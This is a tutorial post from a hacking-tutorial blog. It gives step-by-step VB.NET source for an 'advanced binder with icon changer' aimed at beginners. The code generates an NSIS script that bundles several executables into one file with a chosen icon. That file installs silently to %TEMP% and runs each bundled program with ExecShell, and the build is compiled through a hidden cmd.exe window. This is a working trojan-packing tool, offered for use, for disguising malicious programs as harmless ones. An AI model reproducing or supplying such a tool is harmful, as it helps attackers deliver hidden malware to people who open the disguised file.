[ VB.NET How To Make Advanced Binder With Icon Changer N00b! | Ksecurity-team

Subscribe & Don,t Miss A Free Hacking Course| Receive Daily Updates

Enter your email address:

Delivered by FeedBurner

[ VB.NET How To Make Advanced Binder With Icon Changer N00b!



1 Open Visual Studio 2010/2008
2 New Project
3 Choose the name for the binder
4 Form1.vb will pop up
5 Go to toolbox and get :

1 Listbox
2 Buttons [ 1 Button Called: Add File [ 1 Button Called: Next

Now you need to make the gui in your own way...
When you finishing making the layout for your binder, Click on the button Called: Add File and Post this Source Code:


Code:
Try
    Dim openfile As New OpenFileDialog
    openfile.ShowDialog()
    openfile.Title = "Select files:"
    ListBox1.Items.Add(openfile.FileName)
  Catch ex As Exception
    MsgBox("Please Report Any bugs To me")
  End Try
Now lets double click on the Button Called: Next , And post this Source Code:

Code:
Try
    If ListBox1.Items.Count < 2 Then
    MsgBox("Please choose 2 or more files for binding")
    Else
    Form2.Show()
    Me.Hide()
    End If
  Catch ex As Exception
  MsgBox("Please Report Any bugs To me")
  End Try
Now go to: Project > Add Windows Form > Then press Add

Double Click on the form2.vb and put the import on the top Above Public Class Form2 - Imports System.IO

Example:
Code:
Imports System.IO
Public Class Form2

    Private Sub Form2_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

    End Sub
End Class

Now go back to form2.vb and Click on ToolBox and Add:

2: TextBox
3: Button: 1 Button Called: Icon & Other button Called: Output File & The last button callled: Bind Now
1: RichTextBox1
1: ComboBox1 / With DropDownList as you wish...

When you have finished your layout, Double click on the Form2.vb and put This:
Code:
ComboBox1.SelectedIndex = 0

Example:
Code:
Private Sub Form2_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
  ComboBox1.SelectedIndex = 0
    End Sub
End Class

Now double click on the Button Called Icon and Put this Source Code:
Code:
Try
    Dim openfile As New OpenFileDialog
    openfile.Filter = "ICO files|*.ico"
    openfile.ShowDialog()
    TextBox1.Text = openfile.FileName
  Catch ex As Exception
    MsgBox("Please Report Any bugs To me!")' You can put any message here  i just decided to put that '
  End Try

Example:
Code:
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
  Try
    Dim openfile As New OpenFileDialog
    openfile.Filter = "ICO files|*.ico"
    openfile.ShowDialog()
    TextBox1.Text = openfile.FileName
  Catch ex As Exception
    MsgBox("Please Report Any bugs To me!") ' You can put any message here  i just decided to put that '

    End Sub

Now double click on Button Called Output File, and put this Source Code:
Code:
Try
    Dim savefile As New SaveFileDialog
    savefile.Filter = "exe files|*.exe"
    savefile.ShowDialog()
    TextBox2.Text = savefile.FileName
  Catch ex As Exception
    MsgBox("Please Report Any bugs To me!")' You can put any message here  i just decided to put that '
  End Try

Example:
Code:
Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
  Try
    Dim savefile As New SaveFileDialog
    savefile.Filter = "exe files|*.exe"
    savefile.ShowDialog()
    TextBox2.Text = savefile.FileName
  Catch ex As Exception
    MsgBox("Please Report Any bugs To me!")
  End Try

    End Sub
End Class
Now double Click on Button Called: Bind Now and put this Source Code:

Code:
Try
    If TextBox2.TextLength = 0 Or TextBox1.TextLength = 0 Then
    MsgBox("You need to import the icon and the file So you can proccess")
    Else
    Binder.bind()
    End If
  Catch ex As Exception
  MsgBox("Please Report Any bugs To me!")' You can put any message here  i just decided to put that '
  End Try

Example:
Code:
Private Sub Button3_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button3.Click
  Try
    If TextBox2.TextLength = 0 Or TextBox1.TextLength = 0 Then
    MsgBox("You need to import the icon and the file So you can proccess")
    Else
    Binder.bind()
    End If
  Catch ex As Exception
    MsgBox("Please Report Any bugs To me!") ' You can put any message here  i just decided to put that '
  End Try
    End Sub
End Class

Now go to Project and Add Class... And put this source code on it:
Code:
Imports System.IO
Imports System.Text
Public Class Binder
    Public Shared Sub bind()
  Try
    Dim asc As New ASCIIEncoding()
    If My.Computer.FileSystem.FileExists(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi") Then
    My.Computer.FileSystem.DeleteFile(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi")
    End If
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "!define PRODUCT_NAME ""Binded File""" + vbCrLf, True, asc)
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "!define PRODUCT_VERSION ""1.0""" + vbCrLf, True)
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "!define PRODUCT_PUBLISHER ""IP K1LL3r""" + vbCrLf, True, asc)
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "!define PRODUCT_WEB_SITE ""http://www.hackforums.net""" + vbCrLf, True, asc)
    Select Case Form2.ComboBox1.SelectedItem
    Case "zlib"
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "SetCompressor zlib" + vbCrLf, True, asc)
    Case "bzip2"
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "SetCompressor bzip2" + vbCrLf, True, asc)
    Case "LZMA"
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "SetCompressor LZMA" + vbCrLf, True, asc)
    End Select
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "OutFile " + """" + Form2.TextBox2.Text + """" + vbCrLf, True, asc)
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "InstallDir ""$TEMP""" + vbCrLf, True, asc)
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "Icon " + """" + Form2.TextBox1.Text + """" + vbCrLf, True, asc)
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "SilentInstall silent" + vbCrLf, True, asc)
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "Section ""MainSection"" SEC01" + vbCrLf, True, asc)
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "SetOutPath ""$INSTDIR""" + vbCrLf, True, asc)
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "SetOverwrite try" + vbCrLf, True, asc)
   For a As Integer = 0 To Form1.ListBox1.Items.Count - 1
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "File " + """" + Form1.ListBox1.Items.Item(a) + """" + vbCrLf, True, asc)
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "ExecShell " + """" + """$INSTDIR\" + Path.GetFileName(Form1.ListBox1.Items.Item(a).ToString) + """" + vbCrLf, True, asc)
    Next
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "SectionEnd" + vbCrLf, True, asc)
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "Section -Post" + vbCrLf, True, asc)
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "SectionEnd" + vbCrLf, True, asc)

    Dim start_info As New ProcessStartInfo("cmd.exe")
    start_info.Arguments = "/C %temp%\makensis.exe %temp%\darkbinder.nsi"
    start_info.UseShellExecute = False
    start_info.CreateNoWindow = True
    start_info.RedirectStandardOutput = True
    start_info.RedirectStandardError = True

    ' Make the process and set its start information.
    Dim proc As New Process()
    proc.StartInfo = start_info

    ' Start the process.
    proc.Start()

    ' Attach to stdout and stderr.
    Dim std_out As StreamReader = proc.StandardOutput()
    ' Display the results.
    Form2.RichTextBox1.Text = std_out.ReadToEnd()
    ' Clean up.
    std_out.Close()
    proc.Close()
    'Shell("cmd.exe /C %temp%\makensis.exe %temp%\darkbinder.nsi > c:\log.txt", AppWinStyle.Hide)
    '  Form2.RichTextBox1.LoadFile("C:\log.txt")
  Catch ex As Exception
  MsgBox("Please Report Any bugs")
  End Try
    End Sub
End Class

This tutorial is made Because people said in the other tutorial, That i didn't Explain So This Tutorial is For N00b! ! And others!
Mine looks like this:
[Image: 35bd1cx.png]
[Image: 2zpuiwl.png]




Share your views...

0 Respones to "[ VB.NET How To Make Advanced Binder With Icon Changer N00b!"

Post a Comment

 

Members

Join Us At Facebook

Enter your email address:

Delivered by FeedBurner

© 2011 Ksecurity-team All Rights Reserved Hackguide4u Theme by Adnan Anjum Learn Hacking Online hackguide4u.blogspot.com